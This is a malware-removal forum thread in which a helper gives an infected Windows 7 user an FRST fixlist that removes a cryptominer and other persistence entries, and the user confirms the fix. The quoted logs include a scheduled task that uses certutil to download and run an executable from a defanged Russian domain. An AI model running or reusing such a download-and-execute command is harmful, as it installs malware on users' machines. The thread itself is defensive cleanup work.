Jump to content
Hiimky

Windows 7 is infected, can't install malwarebytes

Recommended Posts

I made a topic about not being able to install malwarebytes and got a reply that my system is infected and that i install FRST.exe and do a scan. Here are my FRST and Addition log file. Hope you can help me out. Thanks in advance!

Addition.txt FRST.txt

Share this post


Link to post
Share on other sites
Posted (edited)

Hello, Welcome to Malwarebytes.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the Windows key + r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.
Please copy the entire contents of the code box below to the a new file.
 

start
	CreateRestorePoint:
CloseProcesses:
RemoveProxy:
Unlock: C:\Windows\windefender.exe
	HKLM-x32\...\Run: [1cd14e23b8028997e07b33198cd399ea] => C:\Users\thinh\AppData\Local\Temp\svchost.exe .. [24064 2016-08-06] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3853315398-2273854794-3376608044-1000\...\Run: [1cd14e23b8028997e07b33198cd399ea] => C:\Users\thinh\AppData\Local\Temp\svchost.exe .. [24064 2016-08-06] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3853315398-2273854794-3376608044-1000\...\Run: [CloudNet] => C:\Users\thinh\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-12-30] (EpicNet Inc.) [File not signed] <==== ATTENTION
HKU\S-1-5-21-3853315398-2273854794-3376608044-1000\...\Policies\Explorer: []
Task: {03682A5D-0732-4405-8FC5-CDFF368FC5E4} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4098560 2019-12-26] () [File not signed] <==== ATTENTION
Task: {22E3C056-2A9F-4D5F-B7DD-9E4B2885D528} - System32\Tasks\InstallShield® Update Service Scheduler => C:\Program Files (x86)\Common Files\InstallShield\Update\ISUSPM.exe [387712 2016-06-23] (Flexera Software LLC -> InstallShield®) [File not signed]
Task: {47BBC637-98FF-4AC9-AEE9-7089AF8CB321} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://imaginemix.ru/app/app.exe C:\Users\thinh\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\thinh\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {D26DDF32-50B4-4BE5-9CCE-22BF1D875722} - System32\Tasks\{D35C59E9-7758-4CB3-AAF8-A9CD37F7CEA4} => C:\Windows\system32\pcalua.exe -a "C:\Users\thinh\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall
Task: {EF7AFDBE-2EF7-4BC5-ACDF-35FADBF4EBDD} - System32\Tasks\InstallShield® Update Helper => C:\Windows\SysWOW64\wscript.exe //nologo //E:jscript //B "C:\ProgramData\InstallShield\Update\isuspm.ini" <==== ATTENTION
Task: C:\Windows\Tasks\InstallShield® Update Helper.job => Wscript.exe J/nologo /E:jscript /B C:\ProgramData\InstallShield\Update\isuspm.ini <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings: [ProxySettingsPerUser] 0 <==== ATTENTION (Restriction - ProxySettings)
ProxyEnable: [HKLM-x32] => Proxy is enabled.
ProxyServer: [HKLM-x32] => http=127.0.0.1:8080;https=127.0.0.1:8080;
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
SearchScopes: HKU\S-1-5-21-3853315398-2273854794-3376608044-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO-x32: True Key Helper -> {0F4B8786-5502-4803-8EBC-F652A1153BB6} -> C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll => No File
Toolbar: HKLM-x32 - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll No File
FF HKU\S-1-5-21-3853315398-2273854794-3376608044-1000\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi => not found
FF Plugin-x32: @t.garena.com/garenatalk -> C:\Program File\bin\Garena Plus\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [No File]
CHR NewTab: Profile 2 ->  Active:"chrome-extension://dbfmnekepjoapopniengjbcpnbljalfg/index.html"
CHR Extension: (Search Manager) - C:\Users\thinh\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bahkljhhdeciiaodlkppoonappfnheoi [2018-07-14]
CHR Extension: (Tab M?i Infinity - Productivity&Speed Dial) - C:\Users\thinh\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\dbfmnekepjoapopniengjbcpnbljalfg [2019-12-25]
S2 servires; C:\Windows\SysWOW64\1098839.dll [37888 2019-12-13] () [File not signed]
S2 SetPipAtcivator; c:\windows\Fonts\svchost.exe [89088 2019-12-13] (Microsoft Corporation) [File not signed]
S2 snmpstorsrv; C:\Windows\system32\snmpstorsrv.dll [334336 2009-07-14] () [File not signed]
S2 VRLService; C:\ProgramData\ASGVIS\Dongle Utilities\startvrlservice.exe [209408 2014-09-05] () [File not signed]
S2 WinDefender; C:\Windows\windefender.exe [2079744 2019-12-13] (Access Denied)  [File not signed]
S3 Winmon; C:\Windows\System32\drivers\Winmon.sys [9352 2019-12-13] (WDKTestCert Admin,131480495282941941 -> ) [File not signed]
S3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [23272 2019-12-13] (WDKTestCert Admin,131480495282941941 -> Windows (R) Win 7 DDK provider) [File not signed]
S1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2019-12-13] (WDKTestCert Admin,131666266076831434 -> ) [File not signed]
NETSVC: vmichapagentsrv -> no filepath.
NETSVC: wmassrv -> no filepath.
NETSVC: snmpstorsrv -> C:\Windows\system32\snmpstorsrv.dll ()
	CustomCLSID: HKU\S-1-5-21-3853315398-2273854794-3376608044-1000_Classes\CLSID\{073CB204-6B29-46FC-AB98-451F1D068741}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2015\Inventor Server\Bin\TestServer.dll => No File
CustomCLSID: HKU\S-1-5-21-3853315398-2273854794-3376608044-1000_Classes\CLSID\{8C23B656-4E6E-4B45-9920-9617168D39A3}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2015\Inventor Server\Bin\TestServer.dll => No File
CustomCLSID: HKU\S-1-5-21-3853315398-2273854794-3376608044-1000_Classes\CLSID\{E5B0515D-48D2-4F04-906D-0192ED65A2DD}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2015\Inventor Server\Bin\TestServer.dll => No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
AlternateDataStreams: C:\ProgramData\TEMP:1CE11B51 [106]
MSCONFIG\startupreg: 1cd14e23b8028997e07b33198cd399ea => "C:\Users\thinh\AppData\Local\Temp\svchost.exe" ..
MSCONFIG\startupreg: CloudNet => "C:\Users\thinh\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe"
MSCONFIG\startupreg: SilentVoice => "C:\Windows\rss\csrss.exe"
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
FirewallRules: [{3B7E5F3E-7ECB-45CE-86CE-EE2DC8E05954}] => (Allow) C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64server.exe No File
FirewallRules: [{16A61F65-F3B5-42E8-A59C-E49BC025033A}] => (Allow) C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64server.exe No File
FirewallRules: [{F8DD34DC-68EF-4D5A-A247-0D3990286B0F}] => (Allow) C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64.exe No File
FirewallRules: [{45203E9D-11FC-48C5-9637-702E1D1FF4FE}] => (Allow) C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64.exe No File
FirewallRules: [TCP Query User{D46B9769-0B5E-4E7F-96E8-65CD7256B951}C:\program files (x86)\electronic arts\eadm\core.exe] => (Allow) C:\program files (x86)\electronic arts\eadm\core.exe No File
FirewallRules: [UDP Query User{B1E04115-19FA-4887-8AF6-C0B80BA29F79}C:\program files (x86)\electronic arts\eadm\core.exe] => (Allow) C:\program files (x86)\electronic arts\eadm\core.exe No File
FirewallRules: [{058F0A76-009F-48B1-8D88-DF2D9745B625}] => (Allow) C:\Users\thinh\AppData\Local\Temp\svchost.exe () [File not signed]
FirewallRules: [{8D440B68-9280-441E-8D97-8BD5E7853C4E}] => (Allow) C:\Users\thinh\AppData\Local\Temp\svchost.exe () [File not signed]
FirewallRules: [TCP Query User{A8A38572-9BCA-4A25-BDE6-AFB261775505}C:\users\thinh\downloads\programs\lolvninstaller.exe] => (Allow) C:\users\thinh\downloads\programs\lolvninstaller.exe No File
FirewallRules: [UDP Query User{26325EF0-4CD7-4505-BC77-8FAE3DA347FA}C:\users\thinh\downloads\programs\lolvninstaller.exe] => (Allow) C:\users\thinh\downloads\programs\lolvninstaller.exe No File
FirewallRules: [TCP Query User{5124E235-8704-44E1-A59A-21FB2A5F624C}C:\program file\bin\garena plus\garenamessenger.exe] => (Allow) C:\program file\bin\garena plus\garenamessenger.exe No File
FirewallRules: [UDP Query User{09EF55F4-22A5-4578-98AF-433210FE43C8}C:\program file\bin\garena plus\garenamessenger.exe] => (Allow) C:\program file\bin\garena plus\garenamessenger.exe No File
FirewallRules: [TCP Query User{F5C14FF6-2B39-4449-BB49-A8DF16B379CE}C:\program file\bin\ros\ros.exe] => (Allow) C:\program file\bin\ros\ros.exe No File
FirewallRules: [UDP Query User{BD0C993E-1E2D-4D46-B90F-B03BE00ACF0B}C:\program file\bin\ros\ros.exe] => (Allow) C:\program file\bin\ros\ros.exe No File
FirewallRules: [TCP Query User{6E7D7E56-5969-4A39-84E6-D085AA4F0277}C:\program file\bin\ros\ccmini\ccmini.exe] => (Allow) C:\program file\bin\ros\ccmini\ccmini.exe No File
FirewallRules: [UDP Query User{B0E92E83-C70D-4E12-B2EA-364793284434}C:\program file\bin\ros\ccmini\ccmini.exe] => (Allow) C:\program file\bin\ros\ccmini\ccmini.exe No File
FirewallRules: [{82169CD6-4F3F-4524-B22B-B9CB0BAC80DF}] => (Allow) C:\Users\thinh\AppData\Roaming\Tencent\TxGameAssistant\GameDownload\TenioDL.exe No File
FirewallRules: [{6527F5C4-406F-4C54-A6C7-020E945E478E}] => (Allow) C:\Users\thinh\AppData\Roaming\Tencent\TxGameAssistant\GameDownload\TenioDL.exe No File
FirewallRules: [{EFC9F3E3-5714-4C1A-B14B-FD2627DB7C27}] => (Allow) C:\Users\thinh\AppData\Roaming\Tencent\TxGameAssistant\GameDownload\TenioDL.exe No File
FirewallRules: [{8F99FBA4-8CAA-486B-BC3A-363E12832487}] => (Allow) C:\Users\thinh\AppData\Roaming\Tencent\TxGameAssistant\GameDownload\TenioDL.exe No File
FirewallRules: [{95447529-F988-4BA2-A168-31589277578E}] => (Allow) C:\Users\thinh\AppData\Roaming\Tencent\TxGameAssistant\GameDownload\TenioDL.exe No File
FirewallRules: [{9A0D51F6-4ADF-4329-AA07-5221943E9E1E}] => (Allow) C:\Users\thinh\AppData\Roaming\Tencent\TxGameAssistant\GameDownload\TenioDL.exe No File
FirewallRules: [{3AF2B537-180F-4E20-A23E-70784F359712}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe No File
FirewallRules: [{7355BBE6-D201-470D-B8E6-A57239A81AED}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe No File
FirewallRules: [{17A7FBE8-6207-41E0-8227-D420B9ABCC0D}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe No File
FirewallRules: [{6D97805A-AEF7-49B6-8D00-D32B1289D11C}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe No File
FirewallRules: [{5333D9F5-1D53-42D7-8D36-CF46F6B38FCA}] => (Allow) F:\SteamLibrary\steamapps\common\Paladins\Binaries\Win32\HirezBridge.exe No File
FirewallRules: [{C68B792E-E0CB-4287-8E9C-8B9942333B97}] => (Allow) F:\SteamLibrary\steamapps\common\Paladins\Binaries\Win32\HirezBridge.exe No File
FirewallRules: [TCP Query User{F08E0949-D516-4194-83D0-F2CD2CE69E54}F:\steamlibrary\steamapps\common\paladins\binaries\win64\paladins.exe] => (Allow) F:\steamlibrary\steamapps\common\paladins\binaries\win64\paladins.exe No File
FirewallRules: [UDP Query User{C3CE29CB-DB1D-4923-B39E-60ACE9087388}F:\steamlibrary\steamapps\common\paladins\binaries\win64\paladins.exe] => (Allow) F:\steamlibrary\steamapps\common\paladins\binaries\win64\paladins.exe No File
FirewallRules: [{840DC729-0FE8-49F0-8589-C35376CA340D}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe No File
FirewallRules: [{F364405D-B8CC-4109-9F6A-4DF8628DC1B3}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe No File
FirewallRules: [TCP Query User{C8B5F3C3-4C56-437A-B6AC-1BDA4F7B0DAE}C:\users\thinh\appdata\local\programs\zalo\zalo-18.11.1\zalo.exe] => (Allow) C:\users\thinh\appdata\local\programs\zalo\zalo-18.11.1\zalo.exe No File
FirewallRules: [UDP Query User{D3CBF347-8224-43BD-9D9A-B756DBFD11B1}C:\users\thinh\appdata\local\programs\zalo\zalo-18.11.1\zalo.exe] => (Allow) C:\users\thinh\appdata\local\programs\zalo\zalo-18.11.1\zalo.exe No File
FirewallRules: [TCP Query User{4AB59BAC-CAC3-435E-B9E8-8D50FB4297F3}C:\users\thinh\appdata\local\programs\zalo\zalo-18.11.2\zalo.exe] => (Allow) C:\users\thinh\appdata\local\programs\zalo\zalo-18.11.2\zalo.exe No File
FirewallRules: [UDP Query User{8D78EB32-D0CB-494C-B4AE-9F8EEF971A14}C:\users\thinh\appdata\local\programs\zalo\zalo-18.11.2\zalo.exe] => (Allow) C:\users\thinh\appdata\local\programs\zalo\zalo-18.11.2\zalo.exe No File
FirewallRules: [TCP Query User{2A78774F-625F-48CA-9FD6-64A466A91F73}C:\users\thinh\appdata\local\programs\zalo\zalo-18.11.5\zalo.exe] => (Allow) C:\users\thinh\appdata\local\programs\zalo\zalo-18.11.5\zalo.exe No File
FirewallRules: [UDP Query User{D0D163C4-8DBD-4925-ABA6-DF755091C6E7}C:\users\thinh\appdata\local\programs\zalo\zalo-18.11.5\zalo.exe] => (Allow) C:\users\thinh\appdata\local\programs\zalo\zalo-18.11.5\zalo.exe No File
FirewallRules: [TCP Query User{624C1464-9A81-4CB7-B5D6-3B764A4754A0}C:\users\thinh\appdata\local\programs\zalo\zalo-18.12.3\zalo.exe] => (Allow) C:\users\thinh\appdata\local\programs\zalo\zalo-18.12.3\zalo.exe No File
FirewallRules: [UDP Query User{7D02217D-738A-4046-A45C-878FC5135072}C:\users\thinh\appdata\local\programs\zalo\zalo-18.12.3\zalo.exe] => (Allow) C:\users\thinh\appdata\local\programs\zalo\zalo-18.12.3\zalo.exe No File
FirewallRules: [{E00D815C-9179-449B-A65C-68AF3C65E822}] => (Allow) C:\Program Files\BlueStacks\HD-Player.exe No File
FirewallRules: [{B808058C-452F-4BCF-92ED-87D97E755B0C}] => (Allow) E:\New folder (4)\Garena\Garena\2.0.1907.0210\gxxsvc.exe No File
FirewallRules: [TCP Query User{31799DCB-B205-4056-8936-373B37BADA8D}C:\users\thinh\appdata\local\programs\zalo\zalo-19.6.2\zalo.exe] => (Allow) C:\users\thinh\appdata\local\programs\zalo\zalo-19.6.2\zalo.exe No File
FirewallRules: [UDP Query User{D4EDA43B-FE97-4CB1-B5CF-DCE24583D2F2}C:\users\thinh\appdata\local\programs\zalo\zalo-19.6.2\zalo.exe] => (Allow) C:\users\thinh\appdata\local\programs\zalo\zalo-19.6.2\zalo.exe No File
FirewallRules: [TCP Query User{9925DDEF-FCDB-496E-9B1C-0FF4FA32A528}C:\users\thinh\downloads\game-de-che-1\aoe-1\empiresx.exe] => (Allow) C:\users\thinh\downloads\game-de-che-1\aoe-1\empiresx.exe No File
FirewallRules: [UDP Query User{43571F84-7251-4B4A-A02F-941ADC9B435D}C:\users\thinh\downloads\game-de-che-1\aoe-1\empiresx.exe] => (Allow) C:\users\thinh\downloads\game-de-che-1\aoe-1\empiresx.exe No File
FirewallRules: [{466ECF9D-674D-4324-A67C-7B3F63054B71}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
FirewallRules: [{7A0F850A-F14F-49D6-94F4-55D4916D49A7}] => (Allow) C:\Users\thinh\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]
FirewallRules: [{5D29B22E-AD56-47D8-A2C0-33FFE8A777A4}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
FirewallRules: [{9A28B732-3419-453E-829C-16D08965549C}] => (Allow) C:\Users\thinh\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]
FirewallRules: [{474BCBC2-3FA6-4C76-B1DB-BA57760594A8}] => (Allow) C:\Users\thinh\AppData\Local\Temp\svchost.exe () [File not signed]
FirewallRules: [{DEC63DE4-0131-49AC-A2CB-0DBC6BC8A5C5}] => (Allow) C:\Users\thinh\AppData\Local\Temp\svchost.exe () [File not signed]
	C:\Users\thinh\AppData\Local\Temp\svchost.exe
C:\Users\thinh\AppData\Roaming\EpicNet Inc
C:\Windows\rss\csrss.exe
C:\Users\thinh\AppData\Local\Temp\csrss
C:\Windows\SysWOW64\1098839.dll
c:\windows\Fonts\svchost.exe
C:\Windows\system32\snmpstorsrv.dll
C:\Windows\conhost.exe
C:\Windows\windefender.exe
	CMD: netsh int ip reset
CMD: ipconfig /flushDNS
	EmptyTemp:
End

Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

If any difficulties remains please run the Farbar programs one more time and post fresh FRST.TXT and Addition.txt logs for my review.

Edited by nasdaq

Share this post


Link to post
Share on other sites

Hi nasdaq. I had cloudnet.exe running in my background and it always spiked my cpu usage up to 80-90% everytime i use my pc and couldn't completely remove it manually, hence the reason i'm trying to install Malwarebytes. Surprisingly after running FRST 'fix' cloudnet doesn't appear and my cpu usage is down to <10%. Here is my Fixlog: 

Fixlog.txt

Share this post


Link to post
Share on other sites

Hi,

Glad we could help.

As suggested if any problem remains post fresh from after running the Farbar program one more time.

Share this post


Link to post
Share on other sites

Glad we could help.

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request.

This applies only to the originator of this thread. Other members who need assistance please start your own topic in a new thread.

Thanks

 

Share this post


Link to post
Share on other sites
Guest
This topic is now closed to further replies.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.